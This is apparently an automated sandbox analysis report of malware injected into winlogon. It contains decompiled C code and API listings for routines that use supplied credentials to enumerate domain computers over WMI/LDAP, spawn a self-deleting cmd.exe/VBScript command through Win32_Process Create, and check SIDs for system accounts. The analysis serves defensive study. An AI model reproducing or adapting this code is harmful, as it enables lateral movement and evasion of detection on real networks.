				 *((char*)(_t169 + 0x38)) =  *(_t169 + 0x48) & 0x000000ff;
				 *((char*)(_t169 + 0x39)) = ( *(_t169 + 0x4c) << 0x00000020 |  *(_t169 + 0x48)) >> 8;
				 *((char*)(_t169 + 0x3a)) = ( *(_t169 + 0x4c) << 0x00000020 |  *(_t169 + 0x48)) >> 0x10;
				 *((char*)(_t169 + 0x3b)) = ( *(_t169 + 0x4c) << 0x00000020 |  *(_t169 + 0x48)) >> 0x18;
				 *((char*)(_t169 + 0x3c)) = E00D7D930( *(_t169 + 0x48), 0x20,  *(_t169 + 0x4c));
				 *((char*)(_t169 + 0x3d)) = E00D7D930( *(_t169 + 0x48), 0x28,  *(_t169 + 0x4c));
				 *((char*)(_t169 + 0x3e)) =  *(_t169 + 0x4e) & 0x000000ff;
				 *((char*)(_t169 + 0x3f)) =  *(_t169 + 0x4f) & 0x000000ff;
				E00D61110(_t130, _t169, _t169, _t164, _t169);
				 *_t130 =  *(_t169 + 0x50);
				 *((char*)(_t130 + 4)) =  *(_t169 + 0x54);
				 *((char*)(_t130 + 8)) =  *(_t169 + 0x58);
				 *((char*)(_t130 + 0xc)) =  *(_t169 + 0x5c);
				 *((char*)(_t130 + 1)) =  *(_t169 + 0x50) >> 8;
				 *((char*)(_t130 + 5)) =  *(_t169 + 0x54) >> 8;
				 *((char*)(_t130 + 9)) =  *(_t169 + 0x58) >> 8;
				 *((char*)(_t130 + 0xd)) =  *(_t169 + 0x5c) >> 8;
				 *((char*)(_t130 + 2)) =  *(_t169 + 0x50) >> 0x10;
				 *((char*)(_t130 + 6)) =  *(_t169 + 0x54) >> 0x10;
				 *((char*)(_t130 + 0xa)) =  *(_t169 + 0x58) >> 0x10;
				 *((char*)(_t130 + 0xe)) =  *(_t169 + 0x5c) >> 0x10;
				 *((char*)(_t130 + 3)) =  *(_t169 + 0x50) >> 0x18;
				 *((char*)(_t130 + 7)) =  *(_t169 + 0x54) >> 0x18;
				 *((char*)(_t130 + 0xb)) =  *(_t169 + 0x58) >> 0x18;
				_t123 =  *(_t169 + 0x5c) >> 0x18;
				 *(_t130 + 0xf) = _t123;
				return _t123;
			}



















    0x00d61872
    0x00d61874
    0x00d61877
    0x00d6187a
    0x00d6187e
    0x00d61884
    0x00d618aa
    0x00d618b1
    0x00d618bd
    0x00d618bd
    0x00d618c4
    0x00d618c4
    0x00d618c4
    0x00d618c4
    0x00d618ca
    0x00d618d4
    0x00d61886
    0x00d61889
    0x00d61890
    0x00d6189c
    0x00d6189c
    0x00d618a3
    0x00d618a3
    0x00d618a3
    0x00d61889
    0x00d618e2
    0x00d618e5
    0x00d618ed
    0x00d618fa
    0x00d6190a
    0x00d6191a
    0x00d6192d
    0x00d6193d
    0x00d61948
    0x00d6194f
    0x00d61952
    0x00d6195a
    0x00d6195f
    0x00d61965
    0x00d6196b
    0x00d61974
    0x00d6197d
    0x00d61986
    0x00d6198f
    0x00d61998
    0x00d619a1
    0x00d619aa
    0x00d619b3
    0x00d619bc
    0x00d619c5
    0x00d619ce
    0x00d619d4
    0x00d619d9
    0x00d619dd

    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D66780, Relevance: 82.7, APIs: 42, Strings: 5, Instructions: 440networkcom
    C-Code - Quality: 16%
    			E00D66780(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v8;
				char _v16;
				signed int _v20;
				short _v1060;
				char _v2408;
				char _v4460;
				char _v4480;
				char _v4504;
				char _v4904;
				void* _v4908;
				char _v4912;
				char _v4916;
				void* _v4920;
				void* _v4924;
				intOrPtr _v4928;
				void _v4932;
				char _v4933;
				char _v4940;
				void* _v4944;
				char* _v4948;
				char _v4952;
				char _v4956;
				char _v4960;
				char _v4964;
				intOrPtr _v4968;
				intOrPtr _v4972;
				char _v4976;
				intOrPtr* _v4980;
				intOrPtr _v4984;
				intOrPtr _v4988;
				unsigned int _v4992;
				intOrPtr _v4996;
				signed int _v5000;
				char _v5004;
				void* __ebp;
				signed int _t150;
				signed int _t151;
				int _t154;
				void* _t160;
				void _t162;
				intOrPtr _t165;
				intOrPtr _t166;
				void _t167;
				intOrPtr _t168;
				char* _t170;
				intOrPtr _t178;
				void _t179;
				intOrPtr _t180;
				intOrPtr* _t181;
				void* _t182;
				intOrPtr* _t186;
				intOrPtr* _t189;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				intOrPtr* _t198;
				intOrPtr* _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t203;
				unsigned int _t204;
				intOrPtr _t216;
				intOrPtr* _t218;
				char _t220;
				intOrPtr* _t227;
				void* _t228;
				intOrPtr* _t230;
				intOrPtr* _t232;
				intOrPtr _t240;
				intOrPtr _t245;
				intOrPtr* _t247;
				intOrPtr _t248;
				intOrPtr* _t249;
				void* _t250;
				signed int _t251;
				void* _t257;
				intOrPtr _t265;
				intOrPtr _t280;
				intOrPtr _t281;
				short* _t291;
				intOrPtr* _t293;
				intOrPtr* _t294;
				intOrPtr _t296;
				intOrPtr* _t297;
				intOrPtr _t298;
				char _t300;
				intOrPtr _t302;
				void* _t303;
				intOrPtr* _t305;
				intOrPtr _t306;
				intOrPtr _t308;
				struct _CRITICAL_SECTION* _t309;
				intOrPtr* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_push(0xffffffff);
				_push(E00D7E3B3);
				_push( *[fs:0x0]);
				E00D7D900();
				_t150 =  *0xd88004; // 0x276b9783
				_t151 = _t150 ^ _t311;
				_v20 = _t151;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t151);
				 *[fs:0x0] =  &_v16;
				_t245 = _a4;
				_t291 = 0;
				_t300 = _a8;
				_v4928 = _t245;
				_v4912 = _t300;
				_v4968 = _a12;
				_v4976 = 0;
				_v4948 = 0;
				_t154 = NetGetDCName(0, 0,  &_v4948);
				if(_t154 != 0) {
					L49:
					 *[fs:0x0] = _v16;
					return E00D6ABE4(_v20 ^ _t311);
				}
				__imp__CoInitializeEx(_t154, _t154);
				if(_t154 < 0) {
					L48:
					NetApiBufferFree(_v4948);
					goto L49;
				}
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 2, 0, 0, 0);
				if(_t154 >= 0 || _t154 == 0x80010119) {
					_v4944 = _t291;
					__imp__CredUIParseUserNameW(_t245,  &_v4460, 0x201,  &_v2408, 0x151);
					_t160 = LocalAlloc(0x40, 0x1c);
					_t247 = __imp__#2;
					_v4908 = _t160;
					_t162 =  *_t247( &_v4460);
					_v4932 = _t162;
					_t302 =  *_t247(_t300);
					_t165 =  *_t247( &_v2408);
					_t293 = __imp__#7;
					_t248 = _t165;
					_t166 =  *_t293(_t302);
					_t257 = _v4908;
					 *((intOrPtr*)(_t257 + 0x10)) = _t302;
					_t303 = _t257;
					 *((intOrPtr*)(_t257 + 0x14)) = _t166;
					_t167 = _v4932;
					 *_t303 = _t167;
					_t168 =  *_t293(_t167);
					 *((intOrPtr*)(_t303 + 4)) = _t168;
					 *((intOrPtr*)(_t303 + 8)) = _t248;
					 *((intOrPtr*)(_t303 + 0xc)) =  *_t293(_t248);
					_t170 =  &_v4944;
					 *((intOrPtr*)(_t303 + 0x18)) = 2;
					__imp__CoCreateInstance(0xd7f4b8, 0, 1, 0xd7f3e8, _t170);
					_t249 = __imp__#6;
					if(_t170 < 0) {
						L46:
						 *_t249( *((intOrPtr*)(_t303 + 8)));
						 *_t249( *((intOrPtr*)(_t303 + 0x10)));
						 *_t249( *_t303);
						LocalFree(_t303);
						_t291 = _v4976;
						goto L47;
					}
					wsprintfW( &_v1060, L"%s\\root\\directory\\LDAP", _v4948);
					_t294 = __imp__#2;
					_t313 = _t312 + 0xc;
					_t178 =  *_t294( &_v1060);
					_v4972 = _t178;
					_t179 =  *_t294(_v4928);
					_v4932 = _t179;
					_t180 =  *_t294(_v4912);
					_v4924 = 0;
					_t280 = _t180;
					_t181 = _v4944;
					_v4988 = _t280;
					_t182 =  *((intOrPtr*)( *_t181 + 0xc))(_t181, _v4972, _v4932, _t280, 0, 0, 0, 0,  &_v4924);
					_t303 = _v4908;
					if(_t182 < 0) {
						L45:
						 *_t249(_v4972);
						 *_t249(_v4988);
						 *_t249(_v4932);
						_t186 = _v4944;
						 *((intOrPtr*)( *_t186 + 8))(_t186);
						goto L46;
					}
					_push(0);
					_push(_t303);
					_t305 = __imp__CoSetProxyBlanket;
					_push(3);
					_push(6);
					_push(0xffffffff);
					_push(0xffffffff);
					_push(0xffffffff);
					_push(_v4924);
					if( *_t305() < 0) {
						L44:
						_t189 = _v4924;
						 *((intOrPtr*)( *_t189 + 8))(_t189);
						_t303 = _v4908;
						goto L45;
					}
					_t191 =  *_t294(L"WQL");
					_v4928 = _t191;
					_t192 =  *_t294(L"SELECT ds_cn FROM ds_computer");
					_v4920 = 0;
					_push( &_v4920);
					_t296 = _v4928;
					_t281 = _t192;
					_t193 = _v4924;
					_push(0);
					_push(0x30);
					_push(_t281);
					_push(_t296);
					_push(_t193);
					_v4984 = _t281;
					if( *((intOrPtr*)( *_t193 + 0x50))() < 0) {
						L43:
						 *_t249(_t296);
						 *_t249(_v4984);
						goto L44;
					}
					_push(0);
					_push(_v4908);
					_push(3);
					_push(6);
					_push(0xffffffff);
					_push(0xffffffff);
					_push(0xffffffff);
					_push(_v4920);
					if( *_t305() < 0) {
						L42:
						_t198 = _v4920;
						 *((intOrPtr*)( *_t198 + 8))(_t198);
						goto L43;
					}
					_v4960 = 0;
					_v4956 = 0;
					_v4952 = 0;
					_v8 = 0;
					_v4916 = 0;
					asm("o16 nop [eax+eax]");
					do {
						_t200 = _v4920;
						_t201 =  *((intOrPtr*)( *_t200 + 0x10))(_t200, 0xffffffff, 5,  &_v4480,  &_v4916);
						_t202 = _v4916;
						if(_t201 < 0) {
							goto L28;
						}
						if(_t202 == 0) {
							break;
						}
						_t251 = 0;
						_v4976 = 1;
						if(_t202 == 0) {
							break;
						}
						do {
							_t227 =  *((intOrPtr*)(_t311 + _t251 * 4 - 0x117c));
							_t275 =  *_t227;
							_t228 =  *((intOrPtr*)( *_t227 + 0x10))(_t227, L"ds_cn", 0,  &_v5004, 0, 0);
							_t327 = _t228;
							if(_t228 < 0) {
								goto L27;
							}
							_t298 = _v4996;
							_t232 = E00D6ABFA(_t251, _t275, _t298, _t305, _t327, 0xc);
							_t310 = _t232;
							_t313 = _t313 + 4;
							_v4980 = _t310;
							_v8 = 1;
							if(_t310 == 0) {
								L19:
								_t305 = 0;
								L20:
								_v8 = 0;
								_v4912 = _t305;
								if(_t305 == 0) {
									L18:
									E00D6B9A0(0x8007000e);
									goto L19;
								}
								_v8 = 2;
								E00D67980( &_v4504, _t298,  *_t305);
								_v8 = 3;
								E00D674A0( &_v4960,  &_v4504);
								E00D67940( &_v4504);
								_t82 = _t305 + 8; // 0x8
								_v8 = 0;
								if(InterlockedDecrement(_t82) == 0) {
									_t240 =  *_t305;
									if(_t240 != 0) {
										__imp__#6(_t240);
										 *_t305 = 0;
									}
									_t241 =  *((intOrPtr*)(_t305 + 4));
									if( *((intOrPtr*)(_t305 + 4)) != 0) {
										E00D6ABF5(_t241);
										_t313 = _t313 + 4;
										 *((intOrPtr*)(_t305 + 4)) = 0;
									}
									_push(0xc);
									E00D6AC32(_t305);
									_t313 = _t313 + 8;
								}
								goto L27;
							}
							 *((intOrPtr*)(_t310 + 4)) = 0;
							 *((intOrPtr*)(_t310 + 8)) = 1;
							__imp__#2(_t298);
							 *_t310 = _t232;
							if(_t232 != 0 || _t298 == 0) {
								goto L20;
							} else {
								goto L18;
							}
							L27:
							__imp__#9( &_v5004);
							_t230 =  *((intOrPtr*)(_t311 + _t251 * 4 - 0x117c));
							 *((intOrPtr*)( *_t230 + 8))(_t230);
							_t202 = _v4916;
							_t251 = _t251 + 1;
						} while (_t251 < _t202);
						L28:
					} while (_t202 != 0);
					_t203 =  &_v4933;
					_t265 = 0x20;
					_v5000 = _t203;
					_t204 = _t203 | 0xffffffff;
					do {
						_t204 = _t204 >> 1;
						_t265 = _t265 - 1;
					} while (_t204 > 0x7fff);
					_t306 = _v4956;
					_t297 = _v4960;
					_v4992 = _t204;
					_v4996 = _t265;
					E00D68C10(_t297, _t306,  &_v5000);
					_t268 = _t306 - _t297;
					if((0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2) > 0x64) {
						E00D673C0( &_v4960, _t268);
						_t306 = _v4956;
						_t297 = _v4960;
					}
					__imp__#115(0x202,  &_v4904);
					_v4940 = 0;
					_t250 = 0;
					_t216 = (0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2);
					_v4980 = _t216;
					if(_t216 == 0) {
						L41:
						__imp__#116();
						_v8 = 0xffffffff;
						E00D679E0(_t250,  &_v4960, _t297);
						_t249 = __imp__#6;
						_t296 = _v4928;
						goto L42;
					} else {
						do {
							if( *((intOrPtr*)(_t297 + 0x14)) < 8) {
								_t218 = _t297;
							} else {
								_t218 =  *_t297;
							}
							__imp__GetAddrInfoW(_t218, 0, 0,  &_v4940);
							_t220 =  *((intOrPtr*)(_v4940 + 0x18));
							__imp__#14( *((intOrPtr*)(_t220 + 4)));
							_t308 = _v4968;
							_v4964 = _t220;
							_v4912 = 0;
							if(E00D67C20(_t250, _t308, _t297,  &_v4964,  &_v4912) != 0 && _v4912 == 0) {
								_t309 = _t308 + 0xc;
								EnterCriticalSection(_t309);
								E00D67B20(_t250, _v4968, _t297,  &_v4964);
								LeaveCriticalSection(_t309);
							}
							__imp__FreeAddrInfoW(_v4940);
							_t250 = _t250 + 1;
							_t297 = _t297 + 0x18;
						} while (_t250 < _v4980);
						goto L41;
					}
				} else {
					L47:
					__imp__CoUninitialize();
					goto L48;
				}
			}



































































































    0x00d66783
    0x00d66785
    0x00d66790
    0x00d66796
    0x00d6679b
    0x00d667a0
    0x00d667a2
    0x00d667a5
    0x00d667a6
    0x00d667a7
    0x00d667a8
    0x00d667ac
    0x00d667bb
    0x00d667be
    0x00d667c0
    0x00d667c6
    0x00d667cc
    0x00d667d2
    0x00d667d8
    0x00d667de
    0x00d667e4
    0x00d667ec
    0x00d66da9
    0x00d66dae
    0x00d66dc6
    0x00d66dc6
    0x00d667f4
    0x00d667fc
    0x00d66d9d
    0x00d66da3
    0x00000000
    0x00d66da3
    0x00d6680d
    0x00d66815
    0x00d6682d
    0x00d66841
    0x00d6684b
    0x00d66851
    0x00d66857
    0x00d66864
    0x00d66867
    0x00d6686f
    0x00d66878
    0x00d6687a
    0x00d66880
    0x00d66883
    0x00d66885
    0x00d6688b
    0x00d6688e
    0x00d66890
    0x00d66893
    0x00d6689a
    0x00d6689c
    0x00d6689f
    0x00d668a2
    0x00d668a7
    0x00d668aa
    0x00d668bf
    0x00d668c6
    0x00d668cc
    0x00d668d4
    0x00d66d7c
    0x00d66d7f
    0x00d66d84
    0x00d66d88
    0x00d66d8b
    0x00d66d91
    0x00000000
    0x00d66d91
    0x00d668ec
    0x00d668f2
    0x00d668fe
    0x00d66902
    0x00d6690a
    0x00d66910
    0x00d66918
    0x00d6691e
    0x00d66926
    0x00d66939
    0x00d6693b
    0x00d66948
    0x00d66957
    0x00d6695a
    0x00d66962
    0x00d66d58
    0x00d66d5e
    0x00d66d66
    0x00d66d6e
    0x00d66d70
    0x00d66d79
    0x00000000
    0x00d66d79
    0x00d66968
    0x00d6696a
    0x00d6696b
    0x00d66971
    0x00d66973
    0x00d66975
    0x00d66977
    0x00d66979
    0x00d6697b
    0x00d66985
    0x00d66d46
    0x00d66d46
    0x00d66d4f
    0x00d66d52
    0x00000000
    0x00d66d52
    0x00d66990
    0x00d66997
    0x00d6699d
    0x00d669a5
    0x00d669af
    0x00d669b0
    0x00d669b6
    0x00d669b8
    0x00d669be
    0x00d669c0
    0x00d669c2
    0x00d669c5
    0x00d669c6
    0x00d669c7
    0x00d669d2
    0x00d66d3b
    0x00d66d3c
    0x00d66d44
    0x00000000
    0x00d66d44
    0x00d669de
    0x00d669e0
    0x00d669e1
    0x00d669e3
    0x00d669e5
    0x00d669e7
    0x00d669e9
    0x00d669eb
    0x00d669f5
    0x00d66d2f
    0x00d66d2f
    0x00d66d38
    0x00000000
    0x00d66d38
    0x00d669fb
    0x00d66a05
    0x00d66a0f
    0x00d66a19
    0x00d66a20
    0x00d66a2a
    0x00d66a30
    0x00d66a30
    0x00d66a4b
    0x00d66a50
    0x00d66a56
    0x00000000
    0x00000000
    0x00d66a5e
    0x00000000
    0x00000000
    0x00d66a64
    0x00d66a66
    0x00d66a72
    0x00000000
    0x00000000
    0x00d66a80
    0x00d66a80
    0x00d66a92
    0x00d66a9c
    0x00d66a9f
    0x00d66aa1
    0x00000000
    0x00000000
    0x00d66aa7
    0x00d66aaf
    0x00d66ab4
    0x00d66ab6
    0x00d66ab9
    0x00d66abf
    0x00d66ac5
    0x00d66af0
    0x00d66af0
    0x00d66af2
    0x00d66af2
    0x00d66af6
    0x00d66afe
    0x00d66ae6
    0x00d66aeb
    0x00000000
    0x00d66aeb
    0x00d66b00
    0x00d66b0c
    0x00d66b17
    0x00d66b22
    0x00d66b2d
    0x00d66b32
    0x00d66b35
    0x00d66b42
    0x00d66b44
    0x00d66b48
    0x00d66b4b
    0x00d66b51
    0x00d66b51
    0x00d66b57
    0x00d66b5c
    0x00d66b5f
    0x00d66b64
    0x00d66b67
    0x00d66b67
    0x00d66b6e
    0x00d66b71
    0x00d66b76
    0x00d66b76
    0x00000000
    0x00d66b42
    0x00d66ac8
    0x00d66acf
    0x00d66ad6
    0x00d66adc
    0x00d66ae0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d66b79
    0x00d66b80
    0x00d66b86
    0x00d66b90
    0x00d66b93
    0x00d66b99
    0x00d66b9a
    0x00d66ba2
    0x00d66ba2
    0x00d66baa
    0x00d66bb0
    0x00d66bb5
    0x00d66bbb
    0x00d66bc0
    0x00d66bc0
    0x00d66bc2
    0x00d66bc3
    0x00d66bca
    0x00d66bd2
    0x00d66bd8
    0x00d66be4
    0x00d66bed
    0x00d66bf9
    0x00d66c0d
    0x00d66c16
    0x00d66c1b
    0x00d66c21
    0x00d66c21
    0x00d66c33
    0x00d66c3b
    0x00d66c4a
    0x00d66c56
    0x00d66c58
    0x00d66c5e
    0x00d66d0b
    0x00d66d0b
    0x00d66d17
    0x00d66d1e
    0x00d66d23
    0x00d66d29
    0x00000000
    0x00d66c64
    0x00d66c64
    0x00d66c68
    0x00d66c6e
    0x00d66c6a
    0x00d66c6a
    0x00d66c6a
    0x00d66c7c
    0x00d66c88
    0x00d66c8e
    0x00d66c94
    0x00d66c9c
    0x00d66caf
    0x00d66cc1
    0x00d66ccc
    0x00d66cd0
    0x00d66ce3
    0x00d66ce9
    0x00d66ce9
    0x00d66cf5
    0x00d66cfb
    0x00d66cfc
    0x00d66cff
    0x00000000
    0x00d66c64
    0x00d66d97
    0x00d66d97
    0x00d66d97
    0x00000000
    0x00d66d97

    APIs
    • NetGetDCName.NETAPI32(00000000,00000000,?,276B9783,?,?,?,?,00D7E3B3,000000FF), ref: 00D667E4
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00D667F4
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D6680D
    • CredUIParseUserNameW.CREDUI(?,?,00000201,?,00000151,?,?,?,?,00D7E3B3,000000FF), ref: 00D66841
    • LocalAlloc.KERNEL32(00000040,0000001C,?,?,?,?,00D7E3B3,000000FF), ref: 00D6684B
    • SysAllocString.OLEAUT32(?), ref: 00D66864
    • SysAllocString.OLEAUT32(?), ref: 00D6686D
    • SysAllocString.OLEAUT32(?), ref: 00D66878
    • SysStringLen.OLEAUT32(00000000), ref: 00D66883
    • SysStringLen.OLEAUT32(?), ref: 00D6689C
    • SysStringLen.OLEAUT32(00000000), ref: 00D668A5
    • CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D668C6
    • wsprintfW.USER32 ref: 00D668EC
    • SysAllocString.OLEAUT32(?), ref: 00D66902
    • SysAllocString.OLEAUT32(?), ref: 00D66910
    • SysAllocString.OLEAUT32(?), ref: 00D6691E
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D66981
    • SysAllocString.OLEAUT32(WQL), ref: 00D66990
    • SysAllocString.OLEAUT32(SELECT ds_cn FROM ds_computer), ref: 00D6699D
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D669F1
    • SysAllocString.OLEAUT32(?), ref: 00D66AD6
    • InterlockedDecrement.KERNEL32(00000008), ref: 00D66B3A
    • SysFreeString.OLEAUT32(00000000), ref: 00D66B4B
    • VariantClear.OLEAUT32(?), ref: 00D66B80
    • WSAStartup.WS2_32(00000202,?), ref: 00D66C33
    • GetAddrInfoW.WS2_32(00000000,00000000,00000000,00000000), ref: 00D66C7C
    • htonl.WS2_32(00000000), ref: 00D66C8E
      • Part of subcall function 00D67C20: EnterCriticalSection.KERNEL32(?,00D655C6,?,?,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?), ref: 00D67C47
      • Part of subcall function 00D67C20: LeaveCriticalSection.KERNEL32(00D655C6,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?,?,00D655C6,?), ref: 00D67C79
    • EnterCriticalSection.KERNEL32(?,?,?), ref: 00D66CD0
    • LeaveCriticalSection.KERNEL32(?,?), ref: 00D66CE9
    • FreeAddrInfoW.WS2_32(00000000), ref: 00D66CF5
    • WSACleanup.WS2_32 ref: 00D66D0B
    • SysFreeString.OLEAUT32(?), ref: 00D66D3C
    • SysFreeString.OLEAUT32(?), ref: 00D66D44
    • SysFreeString.OLEAUT32(?), ref: 00D66D5E
    • SysFreeString.OLEAUT32(?), ref: 00D66D66
    • SysFreeString.OLEAUT32(?), ref: 00D66D6E
    • SysFreeString.OLEAUT32(?), ref: 00D66D7F
    • SysFreeString.OLEAUT32(?), ref: 00D66D84
    • SysFreeString.OLEAUT32(?), ref: 00D66D88
    • LocalFree.KERNEL32(?,?,?,?,?,00D7E3B3,000000FF), ref: 00D66D8B
    • CoUninitialize.OLE32 ref: 00D66D97
    • NetApiBufferFree.NETAPI32(?,?,?,?,?,00D7E3B3,000000FF), ref: 00D66DA3
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D644B0, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 109
    APIs
    • SysAllocString.OLEAUT32(Create), ref: 00D644C6
    • SysAllocString.OLEAUT32(Win32_Process), ref: 00D644CF
    • SysAllocString.OLEAUT32(cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^) & echo.FSO.DeleteF), ref: 00D6453A
    • SysFreeString.OLEAUT32(?), ref: 00D64597
    • SysFreeString.OLEAUT32(00000000), ref: 00D645B5
    • SysFreeString.OLEAUT32(?), ref: 00D645BA
    Strings
    • Create, xrefs: 00D644C1
    • CommandLine, xrefs: 00D6455C
    • Win32_Process, xrefs: 00D644C8
    • cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^) & echo.FSO.DeleteF, xrefs: 00D64535
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D626C0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102
    C-Code - Quality: 74%
    			E00D626C0(void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				char _v1052;
				void* _v1056;
				signed int _t16;
				void** _t22;
				intOrPtr _t24;
				signed int _t25;
				signed int _t29;
				signed int _t32;
				signed int _t33;
				intOrPtr* _t42;
				signed int _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				signed int _t52;

				_t16 =  *0xd88004; // 0x276b9783
				_v8 = _t16 ^ _t52;
				_push(0xdeefbad7);
				_t51 = __edx;
				_t49 = __ecx;
				_push(__edx);
				if(E00D61A30(0, __ecx) == 0 || IsValidSid(_t49) == 0) {
					L10:
					__eflags = _v8 ^ _t52;
					return E00D6ABE4(_v8 ^ _t52);
				} else {
					_t22 =  &_v1056;
					_v1056 = 0;
					__imp__ConvertSidToStringSidW(_t49, _t22);
					if(_t22 == 0) {
						goto L10;
					} else {
						_t23 = _v1056;
						if(_v1056 == 0) {
							goto L10;
						} else {
							_t24 = E00D715F6(__ebx, _t49, _t51, _t23, L"S-1-5-18");
							if(_t24 != 0) {
								_t25 = E00D715F6(__ebx, _t49, _t51, _v1056, L"S-1-5-19");
								__eflags = _t25;
								if(_t25 == 0) {
									L17:
									 *_t51 = 1;
									goto L18;
								} else {
									_t29 = E00D715F6(__ebx, _t49, _t51, _v1056, L"S-1-5-20");
									__eflags = _t29;
									if(_t29 == 0) {
										goto L17;
									} else {
										E00D6D520(_t49,  &_v1052, 0, 0x414);
										_t32 = E00D62650(_t49,  &_v1052, __eflags);
										__eflags = _t32;
										if(_t32 != 0) {
											__eflags = _v12 - 1;
											if(_v12 != 1) {
												L16:
												 *_t51 = 3;
											} else {
												_t42 =  &_v1052;
												_t47 = _t42 + 2;
												asm("o16 nop [eax+eax]");
												do {
													_t33 =  *_t42;
													_t42 = _t42 + 2;
													__eflags = _t33;
												} while (_t33 != 0);
												_t43 = _t42 - _t47;
												__eflags = _t43;
												if(_t43 == 0) {
													goto L16;
												} else {
													 *_t51 = 2;
												}
											}
											goto L18;
										} else {
											LocalFree(_v1056);
											goto L10;
										}
									}
								}
							} else {
								 *_t51 = _t24;
								L18:
								LocalFree(_v1056);
								return E00D6ABE4(_v8 ^ _t52);
							}
						}
					}
				}
			}




















    0x00d626c9
    0x00d626d0
    0x00d626d5
    0x00d626da
    0x00d626dc
    0x00d626de
    0x00d626ec
    0x00d627aa
    0x00d627b0
    0x00d627ba
    0x00d62701
    0x00d62701
    0x00d62707
    0x00d62713
    0x00d6271b
    0x00000000
    0x00d62721
    0x00d62721
    0x00d62729
    0x00000000
    0x00d6272b
    0x00d62731
    0x00d6273b
    0x00d6274f
    0x00d62757
    0x00d62759
    0x00d627f1
    0x00d627f1
    0x00000000
    0x00d6275f
    0x00d6276a
    0x00d62772
    0x00d62774
    0x00000000
    0x00d62776
    0x00d62784
    0x00d62794
    0x00d62799
    0x00d6279b
    0x00d627bb
    0x00d627bf
    0x00d627e9
    0x00d627e9
    0x00d627c1
    0x00d627c1
    0x00d627c7
    0x00d627ca
    0x00d627d0
    0x00d627d0
    0x00d627d3
    0x00d627d6
    0x00d627d6
    0x00d627db
    0x00d627db
    0x00d627df
    0x00000000
    0x00d627e1
    0x00d627e1
    0x00d627e1
    0x00d627df
    0x00000000
    0x00d6279d
    0x00d627a3
    0x00000000
    0x00d627a3
    0x00d6279b
    0x00d62774
    0x00d6273d
    0x00d6273d
    0x00d627f7
    0x00d627fd
    0x00d62817
    0x00d62817
    0x00d6273b
    0x00d62729
    0x00d6271b

    APIs
    • IsValidSid.ADVAPI32 ref: 00D626F3
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00D62713
      • Part of subcall function 00D62650: LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00D627A3
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • LocalFree.KERNEL32(00000000,?,?,?), ref: 00D627FD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
